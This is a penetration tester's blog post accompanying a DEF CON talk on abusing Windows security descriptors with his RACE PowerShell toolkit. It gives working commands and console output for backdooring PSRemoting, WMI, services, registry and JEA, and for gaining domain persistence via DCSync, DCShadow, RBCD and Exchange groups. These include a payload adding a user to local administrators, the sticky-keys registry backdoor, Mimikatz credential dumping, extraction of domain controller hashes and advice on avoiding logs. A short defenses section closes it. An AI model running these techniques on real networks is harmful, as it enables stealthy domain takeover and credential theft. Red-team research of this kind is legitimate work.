Nikhil Mittal / "SamratAshok"
Friday, August 23, 2019

I recently spoke at DEF CON 27 on abusing Security Descriptors and ACLs i.e. permissions on Windows machines.

You can find the slides here (also at the end of the post with minor updates). The demo videos which I used for my talk can be found here on and are also used below.

The RACE toolkit is available on my GitHub repository.

This blog post covers whatever I could not do in my talk. There is only so much you can cover in 45 minutes. On top of that, there was some confusion and my talk was cut short by 10 minutes -.-

tldr; It is possible to execute interesting persistence and on-demand privilege escalation attacks against Windows machines by only modifying ACLs of various objects. We will need administrator privileges initially.

So, let's begin.

We are going to use 'labuser' as the attacker controlled user and 'ops' is the target domain.

About Windows Access Control Model:
Microsoft's documentation on Access Control Model explains it really well. But below is a quick summary:

Every authenticated user gets an access token. Each process or thread created by that user has a copy of that access token. The token contains identity (SIDs) and privileges of the user.

Now, when a process tries to access a securable object (Files, Registry Keys, Services, Domain Objects etc.) it uses the access token. A securable object, by definition, has a security descriptor. A security descriptor can contain Access Control List (ACL) which is a list of Access Control Entries (ACE). There are two types of ACLs Discretionary Access Control List (DACL) and SACL (System Access Control List).

DACL controls access to an object and SACL controls logging of access attempts.

So, when a process or thread tries to access a securable object, the system checks the permissions for the access token (and therefore the user) against each ACE in DACL. The process gets access in case of an explicit allow or if there is no DACL. All other cases result in an access denied.

An ACE contains access control information. The relevant information to this discussion is access mask. The access mask in an ACE contains access rights. This governs what a user can do on an object. For example, a user may have permissions to stop a process whereas another may have the access rights to configure a process. This is what defines access in Windows.

Minimal Permissions
Once we have understood the concept, let's think what makes a Domain Admin so powerful?

A Domain Admin is so powerful because it has permissions to modify almost all objects on machines in a domain.

Do we need Domain Admin privileges for all the interesting things? Not really! We can use just enough rights to perform a particular task. That is, in place of having FullControl or GenericAll over an object we can use Minimal Permissions required to perform a task.

For example, what allows a user to connect to a remote machine using PowreShell Remoting? By default, administrator rights are required. If we have a look at the ACL of the PowerShell Remoting Endpoint we understand that the Administrators group has FullControl over it:

[IMAGE: Microsoft Windows Access Control seetings window for PowerShell]

Do we actually need 'FullControl' to access the target machine using PowerShell Remoting? No! We can connect to the target machine by adding an ACE for a user which we control and provide it Read, Write and Execute permissions. This will allow the user to access the target machine using PSRemoting without admin privileges. Please note that the user's privileges on the target machine will not be elevated!

This is what we are going to focus on. Some interesting backdoor/persistence techniques, some on-demand privilege escalation methods by modifying ACLs of various securable objects.

Introducing the RACE toolkit
To make it easy to execute ACL related attacks, I have written the RACE toolkit. RACE is dervied from Minimal Rights and ACE. You can find it on my GitHub : https://github.com/samratashok/RACE

RACE is a PowerShell module for executing ACL attacks against Windows targets.

RACE uses the ActiveDirectory module for some of the attacks (Set-ADACL and Set-DCPermissions functions). You can get it from a machine where AD DS RSAT is available or from here: https://github.com/samratashok/ADModule

Persistence - PowerShell Remoting
As we saw above, it is possible to access a target machine as a non-admin user using PSRemoting by modifying the ACL of the PSRemoting endpoint.

Using the below commands from RACE, we can modify the ACL of the default PSRemoting endpoint. Let's run it on the DC with DA privileges (please ignore 'I/O operation has been aborted'):

[IMAGE:
session with input/output of calling that command]
PS C:\AD\>
PS C:\AD\> . .\RACE.ps1
PS C:\AD\> Set-RemotePSRemoting -ComputerName ops-dc -SamAccountName labuser –Verbose
]

Now, we will be able to access the target machine 'ops-dc' as labuser using PowerShell Remoting. Please note that the privileges will still be of labuser.

[IMAGE:
Command above with input/output:
PS C:\Users\labuser>
PS C:\Users\labuser>
PS C:\Users\labuser> Enter-PSSession -ComputerName ops-dc
[ops-dc]: PS C:\Users\labuser\Documents> whoami
ops/labuser
[ops-dc]: PS C:\Users\labuser\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
=============================== ================================================== ============ ======
SeMachineAccountPrivilege Add workstation to domain Enabled
SeChangerNotifyPrivilege Bypass traverse checking Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeIncreasingWorkingSetPrivilege Increase a process working set Enabled

]

Here is a video of the above attack:
https://youtu.be/CqVV6Iqwsn0

There are no logs for the ACL modification of PowerShell endpoints. Although, when accessing the target machine there will be Events 4624 (Logon) and 4634 (Logoff).

How is this access useful? We can chain this with other modified permissions. We will come back to that later.

Persistence - WMI
Similarly, we can modify ACLs to access a machine using WMI without admin privileges. In case of WMI, we need to modify ACLs for DCOM endpoint and also for namespaces. For namespaces, we can do it for all of them or only a specific one. The below command does it for all the namespaces:

[IMAGE:
Sample code above executed:
PS C:\AD>
PS C:\AD>
PS C:\AD> Set-RemoteWMI -ComputerName ops-mssql -SamAccountName labuser –Verbose
VERBOSE: Existing ACL for namespace root is:
O:BAG:BAD:(A;CI;CCDCLCSWRPWPRCWD;;;BA)(A;CI;CCDCRP ;;;NS)(A;CCDCRP;;;LS)(A;CI;CCDCRP;;;AU)
VERBOSE: Existing ACL for namespace DCOM is:
O:BAG:BAD:(A;;CCDCLCSWRP;;;BA)(A;;CCDCSW;;;WD)(A;; CCDCLCSWRP;;;S-1-5-32-562)(A;;CCDCLCSWRP;;;LU)(A;;CCDCSW;;;AC)
VERBOSE: New ACL fornamespace root is:
O:BAG:BAD:(A;CI;CCDCLCSWRPWPRCW;;;BA)(A;CI;CCDCRP; ;;NS)(A;CI;CCDRP;;;LS)(A;CI;CCDCRP;AU)(A;CI;CCDCLC SWRPWPPRCWD;;;S-1-5-21-738119705-704267045-3387619857-1115)
VERBOSE: New ACL fornamespace DCOM:
O:BAG:BAD:(A;;CCDCLCWRP;;;BA)(A;;CCDCSW;;;WD)(A;CC DCLCSWRP;;;S-1-5-32-562)(CCDCLCSWRP;;;LU)(A;;CCDCSW;;AC)(A;;CCDCLCSWRP ;;;S-1-5-21-738119705-704267045-3387619857-1115)
]

Now, we can simply run commands as 'labuser' on the target machine:

[IMAGE:
Command executed with inout and output:
PS C:\Users\labuser> Invoke-WMIMethod -Class win32_process -Name Create -Computername ops-mysql -ArgumentList calc.exe

__GENUS : 2
__CLASS : __PARAMETERS
__SUPERCLASS :
__DYNASTY : __PARAMETERS
__RELPATH :
__PROPERTY_COUNT : 2
__DERIVATION : {}
__SERVER :
__NAMESPACE :
__PATH :
ProcessID : 2256
ReturnValue : 0
ResturnValue : 0
PSComputerName :
]


WMI Permanent Event Consumers - In my testing, with modified permissions to the root\subscription namespace it was possible to create permanent event consumers but the payload never executed. This is something which someone else can explore.

Like PSRemoting, there are no logs for ACL modification but logs 4624 and 4634 will be there when we use WMI to access the target machine.

On-demand Privilege Escalation - Windows Services
Windows services are very useful for persistence AND getting admin privileges back.

Here is how we can abuse admin privileges with windows services:

- Initially with admin privileges, we can create new services or modify existing services to run as SYSTEM.
- We also modify ACLs of such services to allow permissions to config and restart for a user we control.
- As the user we control, reconfigure the target service on the target machine to change its executable path to our payload.
- Restart the service to execute the payload.

Creating new service:
Use the below command to provide labuser GenericAll rights over scmanager (needs admin rights):

[IMAGE:
Command with input and output:
PS C:\Users\labuser> Set-RemoteServicePermissions -SamAccountName labuser -ComputerName ops-build -ServiceName scmanager -Verbose
VERBOSE: The existing ACL of the scmanager service on ops-build. Please note this is as though there is no automatic cleanup.
D:(A;;CC;;;AU)(A;;CCLCRPC;;;IU)(A;;CCLCRPRC;;;SU)( A;;CLCCRPWPRC;;;SY)(A;;KA;;;BA)(A;;CC;;;AC)
VERBOSE: New ACL Manager of the scmanager serviceon ops-build.
D:(A;;GA;;;S-1-5-21-738119705-704267045-3387619857-1115)(A;;CC;;;AU)(A;CCLCRPRC;;;IU)(A;;CCLCRPRC;;;S U)(A;;CCLCRPWPRC;;;SY)(A;;KA;;;BA)(A;;CC;;;AC)
VERBOSE: Modifying ACL of the scmanager service on ops-build
[SC] SetServiceObjectSecurity SUCCESS
]

SCManager is a special service which provides the ability to create new services on a machine. After the above command, labuser can create services on the target machine:

[IMAGE:
Example command with input/output:
PS C:\Users\labuser> Set-RemoteServiceAvuse -ComputerName ops-build -UserName 'ops\labuser' -CreateService evilsvcc -SamAccountName labuser -Verbose
VERBOSE: Creating service evilsvcc on ops-build
[SC] CreateService SUCCESS
Run the following command (need administrator privileges on ops-build) to get Restart rights or wait for evilsvcc to restart.
Set-RemoteServicePermissions -SamAccountName labuser -ServiceName evilsvcc -ComputerName ops-build
Run the below command as labuser after the above to abuse the service permission.
sc.exe \\ops-build start evilsvcc
PS C:\Users\labuser>
]

The above command sets the service start type to auto and the account to LocalSystem. The binpath or executable of the service is set to the specified payload. By default, the payload is to add the user specified by UserName parameter to the local administrators group.

After the above command, we can either wait for the service restart or a system reboot:

If you don't want to wait, run the below command (suggested by the tool) with admin privileges on the target machine to get restart permissions for the created service for our user:

[IMAGE:
Example command with input/output:
PS C:\RACE> Set-RemoteServicePermission -SamAccountName labuser -ServiceName evlsvcc -ComputerName ops-build
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLO CRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLO CRRC;;;SU)
D:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738119705-704267045-3387619857-1115)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPD TLOCRSDCRWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCS WLOCRRC;;;SU)
[SC] SetServiceObjectSecurity SUCCESS
PS C:\RACE>
]

Now, when we restart the 'evilsvc' service, 'labuser' is added to the local administrators group on the target machine.

[IMAGE:
Example command with input/output:
PC C:\Users\labuser> sc.exe \\ops-build start svilsvcc
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

PS C:\Users\labuser> Enter-PSSession -ComputerName ops-build
[ops-build]: PS C:\Users\labuser\Documents> net localgroup administrators
Alias name administrators
Comment Administrator have complete and unrestricted access to the computer/domain

Members

--------------------------------------------------------------------------------
Administrator
ops\buildadmin
ops\labuser
The command completed successfully.
]

Modifying existing service:

With admin equivalent permissions (CCDCLCSWRPWPDTLOCRSDRCWDWO) on any service, we can abuse it to escalate privileges. Please refer to the documentation https://docs.microsoft.com/en-us/win...hz/ace-strings) for a full list of the rights.

The below command modifies the ACL of ALG service on the target machine to provide 'labuser' enough rights to configure and restart the service:

[IMAGE:
Example command with input/output:
PS C:\RACE> SetRemoteServicePermissions -SamAccountName labuser -ServiceName ALG -ComputerName ops-build -Verbose
VERBOSE: The existing ACL of the ALG service on ops-build. Please note this as there is no automatic clean up.
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRWPDTLOC RSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOC RRC;;;SU)
VERBOSE: New ACL of the ALG service on ops-build.
D:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738119705-704267045-3387619857-1115)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCDWRPWPD TLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCS WLOCRRC;;;SU)
VERBOSE: Modifying ACL of the ALG Service on ops-build.
[SC] SetServiceObjectSecurity SUCCESS
PS C:\RACE>
]

Next, run the below command as labuser:

[IMAGE:
Example command with input/output:
PS C:\Users\labuser> Set-RemoteServiceAbuse -ComputerName ops-build -UserName 'ops\labuser' -ServiceName ALG -SamAccountName labuser -Verbose
VERBOSE: Configure service ALG on ops-build
[SC] ChangeServiceConfig SUCCESS
VERBOSE: Starting service ALG on ops-build to execute net localgroup administrators ops\labuser /add
[SC] StartService FAILED 1053:

The service did not respnd to the start or control request in a timely fashion.

PS C:\Users\labuser> Enter-PSSession -ComputerName ops-build
[ops-build]: PS C:\Users\labuser\Documents> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computerdomain

Members

-------------------------------------------------------------------------------
Administrator
ops\buildadmin
ops\Domain Admins
ops\labuser
The command completed successfully.
]

Now, when we restart the ALG service, labuser is added to the local administrators group on the target machine.

Below is a video of the attack:

video: https://youtu.be/qIzyZhbnQ18

I prefer using an existing service in place of creating a new one.

Please note both the methods are verbose in the logs. Service creation, service configuration changes and service stop/start is logged. Therefore, this method is not recommended on DCs or when you want to be stealthy.

On-demand Privilege Escalation - Registry Autoruns
Windows registry is a very attractive target for persistence with on-demand privilege escalation. As a very simple example, let's have a look at Image File Execution Options which is a popular method of running a payload as SYSTEM using 'sticky keys'.

The idea is to modify the ACL of the Registry key responsible for Remote Registry (HKLM:\ SYSTEM\CurrentControlSet\Control\SecurePipeServers \winreg) and for sethc.exe (HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe) to be able to change registry remotely without needing admin privileges. To be able to trigger this remotely on a RDP logon session, NLA needs to be disabled by modifying (HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp).

Run the below commands with admin privileges on the target machine to setup the registry key permissions:

Then run the below command as labuser to set payload for sethc and to disable NLA:

Now, try to connect to the target machine using RDP and press the Shift key five times to get a command prompt with SYSTEM privileges!

The particular method we used is not very silent (even some AVs flag modification of Image File Execution Options registry key) and actually downgrades the security of the target machine. So please use this carefully in an actual operation.

Implementing some better registry key based command execution is something which is in future goals of the RACE tool.

Persistence - DCOM
We can modify the ACL of the DCOM endpoint (recall that we already did that while abusing WMI) for persistence. Like WMI, we will have command execution with the privileges of only the current user. But as we will see soon, something like that is very helpful when chained with other ACL modifications.

Run the below command with admin rights on the target machine to modify ACL of DCOM endpoint:

Now, run the below command as labuser to execute commands using DCOM on the target machine. By default, the method used for execution is MMC20.Application class. [url=https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/]https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/[url]

On demand Privilege Escalation - Just Enough Administration (JEA)
JEA is a PowerShell v5 feature which provides control over administrative tasks by providing PowerShell Remoting endpoint with:
- Virtual accounts - temporary local accounts which are local admin on member machines and DA on DCs but no rights to manage resources on network.
- Ability to limit the cmdlets and commands which a user can run through Role Capabilities.

JEA is designed to 'allow non-admins to do some admin tasks' with 'least privileges'. This is precisely what we have been doing so far.

So, JEA provides admin rights to anyone who is explicitly allowed to connect to the endpoint. But the control on those administrative rights is because of the commands and cmdlets they can execute as a JEA session starts in NoLanguage mode. Only explicitly allowed commands and cmdlets are allowed. It is possible to only allow a single command with only one parameter or argument allowed!

JEA endpoints also have transcripts enabled so that all the commands and their outputs are written to a flat text file. In addition to that, Event logs for 'WinRM Virtual Users\WinRM_VA_AccountNumber_domain_username' will be logged. PowerShell script block logging may also log any suspicious logs.

With all these checks, how can we abuse JEA? Look at the JEA Security Considerations for some evil ideas ;)

With admin privileges on the target machine, we can Register a new JEA endpoint, allow all the cmdlets and commands and allow a user we control to connect to it. We can set the transcript log path to user's temp directory and clear the transcripts when we connect to the machine.

Let's use this against a DC. Run the below command with DA privileges to create a JEA Endpoint 'microsoft.powershell64' which allows access to labuser:

[IMAGE:
Example command with input/output: ("labuser" is underlined, and value associated with "Name:" is underlined: "microsoft.powershell64")
PS C:\> Set-JEAPermissions -ComputerName ops-cd -SamAccount labuser -Verbose

Directory: C:\Program Files\WindowsPowerShell\Modules\JEARoles

Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
d----- 7/25/2019 8:18 PM RoleCapabilities ops-dc
WARNING: You are running in a remote session and have selected the Force option which means the WinRM services may restart.If the WinRM service restarts then this remote session will be terminated and you will need to create a new session to continue

PSPath : Microsoft.WSMan.Management\WSMan::localhost\Plugin \microsoft.powershell64
PSParentPath : Microsoft.WSMan.Management\WSMan::localhost\Plugin
PSChildName : microsoft.powershell64
PSDrive : WSMan
PSProvider : Microsoft.WSMan.Management\WSMan
PSIsContainer : True
PSComputerName : ops-dc
RunSpaceId : 26544ca3-7278-45c3-80a4-b0ea69398ae
Keys : {Name=microsoft.powershell64}
Name : microsoft.powershell64
TypeNameOfElement : Container
Type : Container
]

[IMAGE:
Example command with input/output: (truncated from image)
PS C:\users\labsuser>
PS C:\users\labsuser>
PS C:\users\labsuser> Enter-PSSession -ComputerName ops-dc -ConfigurationName microsoft.powershell64
[ops-dc]: PS C:\Windows\system32>
[ops-dc]: PS C:\Windows\system32> whoami
winrm virtual users\winrm va_7_ops_labuser
[ops-dc]: PS C:\Windows\system32>
[ops-dc]: PS C:\Windows\system32>
[ops-dc]: PS C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
=================================== ==================================== ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
[truncated]
SeDebugPrivilege Debug programs Enabled
[truncated]
SeChangeNotfyPrivilege Bypass traverse checking Enabled
[truncated]
SeImpersonatePrivilege Impersonalte a client after auth Enabled
SeCreateGlobalPrivilege Create global objects Enabled
[truncated]
]

Neat, isn't it!

Below is a video of the attack:

Video: https://youtu.be/D7mgKfPdxOg

Please note that there are no logs for new session registration. But, there are Events 4624, 4634 and 4717 when we access the target machine. Alos, keep in mind the PowerShell logs.

The best way to avoid against JEA abuse really is to audit the registered session configurations and role capabilities. A good guidance on audit and report on JEA is here. https://docs.microsoft.com/en-us/pow...dit-and-report


Persistence - Registry
Windows registry stores many interesting credentials - Machine account, Local users and Cached domain credentials. By modifying the ACL for the registry keys where we store these credentials, it is possible to access these credentials without needing admin privileges later on. We need to modify permissions of the following registry keys:
- HKLM:\ SYSTEM\CurrentControlSet\Control\Lsa\
- HKLM:\Security\
- HKLM:\SAM\

Once we have modified the ACLs of these keys, we can then modify ACL of Remote registyr, WMI or PowerShell Remoting to access the machine and extract the credentials.

RACE uses code from the DAMP toolkit [url=https://github.com/HarmJ0y/DAMP/]https://github.com/HarmJ0y/DAMP/[url] for this:

Use the below command to modify the permissions of the above registry keys and remote registry. We are targeting a DC so need DA privileges.:

[IMAGE:
Example command with input/output:
PS C:\RACE> Add-RemoteRegBackdoor -ComputerName ops-dc -Trustee labuser -Verbose
VERBOSE: [ops-dc : ] Using trustee username 'labuser'
VERBOSE: [ops-dc] Attaching to remote registry through StdRegProv
VERBOSE: [ops-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers \winreg] Backdooring started for key
VERBOSE: [ops-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers \winreg] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERITANCE_ACE)
VERBOSE: [ops-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers \winreg] Creating the trustee WMI object with user 'labuser'
VERBOSE: [ops-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers \winreg] Applying Trustee to new Ace
VERBOSE: [ops-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers \winreg] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [ops-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers \winreg] backdooring completed for key
VERBOSE: [ops-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring started for key
VERBOSE: [ops-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating ACE with Access Mask of 983103 (ALL_ACCESS) ad AceFlags of 2 (CONTAINER_INHERITANCE_ACE)
VERBOSE: [ops-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating the trustee WMI object with user 'labuser'
VERBOSE: [ops-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Applying Trustee to new Ace
VERBOSE: [ops-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Calling SetDescurityDescriptor on the key with the newly create Ace
]

Now, use the below command to extract the machine account hash (uses remote registry):

[IMAGE:
Example command with input/output:
PS C:\Users\labuser> Get-RemoteMachineAccountHash -ComputerName ops-dc -Verbose
VERBOSE: Bootkey/Syskey : AF601480B146AB16BBEA617D5CE0C0B0
VERBOSE LSA Key : B3F4577CFA69F36599F7B51643D7A745F20F29FE1BE0253A1A 757C7E1DEFC369

ComputerName MachineAccountHash
------------ ------------------
ops-cd fcaa5e2ad2ec83f74e0e2c3194506c9b
]

ICYMI, machine account of DC can run the DCSync attack!

Use the Get-RemoteLocalAccountHash function to ectract local acccount hashes. In case of the DC, this gives the NTLM hash of the DSRM account!


Remeber that we left a question - how modifying ACLs of PSRemoting is useful? This is a very good example. in case you cannot access remote registry (for example, filtered on firewall), you can modify the ACL of PSRemoting and the Registry keys and extract the secrets from the DC without admin privileges:

[IMAGE:
Example command with input/output
PS C:\Users\labuser> $opsdc = New-PSSession -ComputerName ops-dc
PS C:\Users\labuser> Invoke-Command -FilePath C:\RACE\RACE.ps1 -Session $opsdc
PS C:\Users\labuser> Enter-PSSession $opsdc
[ops-dc]: PS C:\Users\labuser\Documents> Get-RemoteMachineAccountHash

ComputerName MachineAccountHash
------------ ------------------
OPS-DC fcaa5e2ad2ec83f74e0e2c3194506c9b
]

Sweet!
Below is a video of the attack:

Video: https://youtu.be/nHhebfX78B0

Note that there is no log for change in permission of the registry keys. But as for the other attacks, there will be 4624 and 4634 log entries when accessing the DC.

On demand Privilege Escalation on DC - DNSAdmins
DNSAdmins is an AD security group which has the capability to load arbitrary DLLs from a UNC path in the DNS service. See this post https://medium.com/@esnesenon/featur...e-a0f779b8dc83 and my post http://www.labofapenetrationtester.c...directory.html.
This group is effectively DA equivalent if DNS service is running on a DC.

The group has Read, Write, Create All Child objects, Delete Child objects, Special Permissions on the DNS Server object. We can either:
- Modify ACL of the DNS Server object to have the same rights as the DNSAdmins group to abuse the DLL configuration feature.

or

- Modify the ACL of the DNSAdmins group because it is not a Protected Group (ACL not protected by AdminSDHolder)

Let's modify the ACL of the DNS Server object to be able to load DLL remotely and also provide service start and stop rights on the DNS service for a user we control. Use the below command:

Now, use the below command as labuser to load mimilib.dll from Mimikatz to load the DLL in DNS Service. Please note that the DNSServer module from DNS RSAT is required for the below command:

On demand Privilege Escalation on DC - DSRM Administrator
DSRM administrator is a special 'local administrator' account on a DC. This is very useful for persistence https://adsecurity.org/?p=1785 as it is seldom changed. By default, this user cannot logon from network. But this logon behavior can be changed by modifying the registry key - HKLM:\System\CurrentControlSet\Control\Lsa\DsrmAdm inLogonBehavior and set its value to 2.

This means, once we have DA privileges, we can:
- Extract the hash for DSRM administrator (Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"') or we can also chain this with modification of registry keys, as discussed previously, to obtain the DSRM hash without admin privileges.

- Modify the permissions of the above registry key so that a user we control can change it on demand.
- Use Mimikatz PTH to connect to the DC.

Lets try it. Run the below command to modify the DSRMLogonBehavior registry key and allow labuser to modify it anytime. If the key doesn't exist, it is created:

[IMAGE:
Example command with input/output
PS C:\RACE> . .\RACE.ps1
PS C:\RACE Set-DCPermission -Method DSRMAdmin -SamAccountName labuser -Server ops-dc -Verbose
Use the below command for abusing the permissions.
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\LSA" -Name "DsrmAdminLogonBehavior" -Value 2
PS C:\RACE>

As labuser, we can modify the registry key. Note that this needs to be coupled with modification of ACL of a remote access method (PSRemoting, WMI, Remote Registry or DCOM). Let's use PSRemoting for that:

[IMAGE:
Example command with input/output
[ops-dc]: PS C:\Users\labuser\Document> Set-ItemProperty "HKLK:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -value 2
[ops-dc]: PS C:\Users\labuser\Document>
]

Now, we can use PTH (note the /domain parameter in the below command) to access the DC. We need to use NTLM authentication to access the DC as we are using a local account:

Persistence using DC - Resource-based Constrained Delegation (RBCD)
Resource-based Constrained Delegation enables the resource owner to set delegation to it. Unlike the traditional Delegation, DA privileges are not required to set RBCD.

As per this post, for Generic DACL abuse [url=https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#generic-dacl-abuse]https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#generic-dacl-abuse[url] of RBCD, if a user we control has Write permissions on a computer object, that user can configure RBCD on the machine. This allows the ability to access the target machine as any user including DA.

Use the below command to give labuser permissions to configure RBCD on 'ops-file' by modifying the ACLs of ops-file computer object. This will need DA privileges:

[IMAGE:
Example command with input/output
PS C:\RACE Import-Module C:\AD\Tools\AMDModule-master\ADModule-master\Microsoft.ActiveDirectory.Management.dll
PS C:\RACE Import-Module C:\AD\Tools\AMDModule-master\ADModule-master\ActiveDirectory\ActiveDirectory.psd1
PS C:\RACE> Set-DCPermissions -Method RBCD -DistinguishedName 'CN=OPS-FILE,OU=Servers,DC=offensiveps,DC=Powershell,DC=lo cal' -SAMAccountName labuser -Verbose
VERBOSE: Modifying ACL of CN=OPS-FILE,OU=Servers,DC=offensiveps,DC=powershell,DC=lo cal on the DC
WARNING: This function needs Active Directory module! Please import it or get it from https://github.com/samratashok/ADModule
VERBOSE: Getting the existing ACL for CN=OPS-FILE,OU=Servers,DC=offensiveps,DC=powershell,DC=lo cal.
VERBOSE: Setting ACL for "CN=OPS-FILE,OU=Servers,DC=offensiveps,DC=powershell,DC=lo cal" for "labuse" to use "GenericWrite" right
You can now abuse Resource-based Constrained Delegation on CN=OPS-FILE,OU=Servers,DC=offensiveps,DC=powershell,DC=lo cal as labuser.
]


As labuser, run the below command (needs the ActiveDirectory module) to configure RBCD from attacker machine ops-user1$ to ops-file. This enables us to access ops-file as any user when we impersonate the ops-user1 machine:

[IMAGE:
Example command with input/output
PS C:\Users\labuser> Import-Module C:\AD\Tools\ADModule-master\ADModule-master\Microsoft.ActiveDirectory.Management.dll
PS C:\Users\labuser> Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1
PS C:\Users\labuser> Set-ADComputer -Identity ops-file -PrincipalsAllowedToDelegateToAccount ops-user1$ -Verbose
VERBOSE: Performing the operation "Set" on target "CN=OPS-FILE,OU=Servers,DC-offensiveps,DC=powershell,DC=local".
]

We can extract the AES256 keys for the ops-user1$ account by dumping credetials on that machine (Invoke-Mimikatz -Command '"sekurlsa::ekeys"').

Now, we can use Rubeus https://github.com/GhostPack/Rubeus/ to impersonate a DA which effectively means local admin on ops-file.

Please note that we are merely impersonating the DA for accessing ops-file. We cannot access any other machine from ops-file as DA.

Persistence using DC - Exchange Groups
Exchange creates multiple groups on installation. Groups like Exchange Servers, Exchange Trusted Subsystem and Exchange Windows Permissions have interesting permissions. The groups are added in a new container 'Microsoft Exchange Security Groups'.

None of the Exchange Groups is a protected group so we can modify their ACLs for persistence.
Let's target the Exchange Windows Permissions group which has WriteDACL permission on the domain object (or even forest root domain object depending on the installation).

In our example, we target the Exchange Windows Permissions group on the forest root powershell.local.

Using DA privileges (on forest root in this case), run the below command to provide labuser WriteDACL permissions on the Exchange Windows Permissions group:

Now, as labuser, we modify the ACL of the Exchange Windows Permissions group and add WriteMember rights to labuser. Note that this is just one of the paths once we have WriteDACL on the group:

Next, add labuser (or a proxy user) to the Exchange Windows Permissions group. Because of this group membership, labuser will have WriteDACL rights on the domain object of the forest root:

Using the WriteDACL rights with labuser, add DCSync rights for labuser:

Finally, run the DCSync attack:

Below is a video of the attack:

Video: https://youtu.be/sySINjLZzwk

Other well known techqniues implemented in the RACE tookit are:

AdminSDHolder
ICYMI, the ACL of the AdminSDHolder is overwritten on all Protected Groups by an automatic process called SDProp every 60 minutes. This means any changes we do to the ACL of AdminSDHolder will be propagated to all the Protected Groups too. Therefore, it is a very interesting persistence technique.

Use the below command as DA to add WriteDACL permissions for labuser on AdminSDHolder:

This allows us to push whatever permissions we want on all the Protected Groups as labuser:

DCSync
The most famous ACL abuse. We can modify the ACL of the domain object to provide DCSync rights to a user we control. Run the below as DA:

DCShadow
DCShadow provides very useful forest persistence. See this https://www.dcshadow.com/ and this https://www.labofapenetrationtester..../dcshadow.html.

With DA privileges on forest root and from a machine joined to forest root, run the following command to modify ACLs of multiple objects. This will allow to run DCShadow without DA:


The above command modifies ACLs for:

The domain object.
- DS-Install-Replica (Add/Remove Replica in Domain)
- DS-Replication-Manage-Topology (Manage Replication Topology)
- DS-Replication-Synchronize (Replication Synchronization)

The Sites object (and its children) in the Configuration container.
- CreateChild and DeleteChild

The object of the computer which is registered as a DC - ops-user1 above.
WriteProperty (Not GenericWrite)

The target object - serviceuser above
WriteProperty (Not GenericWrite)

We can now run DCShadow against serviceuser from ops-user1 as labuser.

Previous work
Directly taken from my talk slides:
- ACL abuse is not something new, system administrators have been using this for so many years!
- We can still see articles from 2001 talking about setting Launch Permissions for DCOM http://active-undelete.com/dcom-configuration.htm, for WMI from 2002 https://redmondmag.com/articles/2002...-with-wmi.aspx and so on.
- (French) Chemins de contrôle en environnement Active Directory https://www.sstic.org/2014/presentat...ive_directory/
- An ACE Up the Sleeve Designing Active Directory DACL Backdoors (DEF CON 25) https://media.defcon.org/DEF%20CON%2...The-Sleeve.pdf

Defenses
Protecting your privileged users is definitely the best defense.

Event logs are also useful for detecting these attacks. While there are almost no logs for ACL changes in the default configuration, we can still use the security logs when someone accesses a target machine using Events 4624, 4634 and 4672 in case of admin logon.

For ACL change logs, configure Auditing for ACL changes. See this technet article https://blogs.technet.microsoft.com/...via-ds-access/ for guidance.

Regular ACL auditing is also useful in weeding out unnecessary or malicious ACEs. We can use tools like BloodHound https://github.com/BloodHoundAD/BloodHound, ADACLScanner https://github.com/canix1/ADACLScanner and PingCastle https://github.com/vletoux/pingcastle for that.

A project I created Deploy-Deception https://github.com/samratashok/Deploy-Deception, can be used in creating accounts which have mis-configured ACLs and have verbose logging enabled. It is useful tricking an attacker in assuming they found object(s) with misconfigured ACLs

Future Work
Directly taken from my talk slides:

- Service Permissions are stored in Registry. So, that is a place ripe for abuse.
- As noted earlier, WMI Permanent Event Consumer needs to be explored more.
- For the RACE toolkit, work on hiding the ACE we introduce is highly desirable. Also, implementation of more Registry Autoruns! Currently, Remove option does not work for multiple functions.

That is all! Hope you like it!

